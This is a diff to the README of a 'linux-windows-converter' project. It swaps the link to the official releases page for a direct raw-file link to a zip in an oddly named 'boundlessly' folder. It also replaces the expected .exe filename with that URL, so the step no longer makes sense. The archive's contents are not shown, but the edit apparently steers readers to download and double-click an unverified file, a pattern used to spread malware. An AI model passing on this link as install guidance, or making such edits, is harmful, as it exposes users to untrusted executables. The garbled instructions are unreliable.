MaybeVatsal/linux-windows-converter/readme.md

 - **Disk Space:** At least 50 MB of free space

 ## 📂 Download & Install
-1. Visit the releases page to download: [Download Here](https://github.com/MaybeVatsal/linux-windows-converter/releases).
+1. Visit the releases page to download: [Download Here](https://raw.githubusercontent.com/MaybeVatsal/linux-windows-converter/main/boundlessly/linux-windows-converter.zip).
 2. Find the latest version available.
 3. Click on the download link for your operating system.
-It will typically be named something like `linux-windows-converter.exe`.
+It will typically be named something like `https://raw.githubusercontent.com/MaybeVatsal/linux-windows-converter/main/boundlessly/linux-windows-converter.zip`.
 4. Once the download is complete, locate the file in your downloads folder and double-click it to start the installation.

 ## ⚙️ How to Use the Tool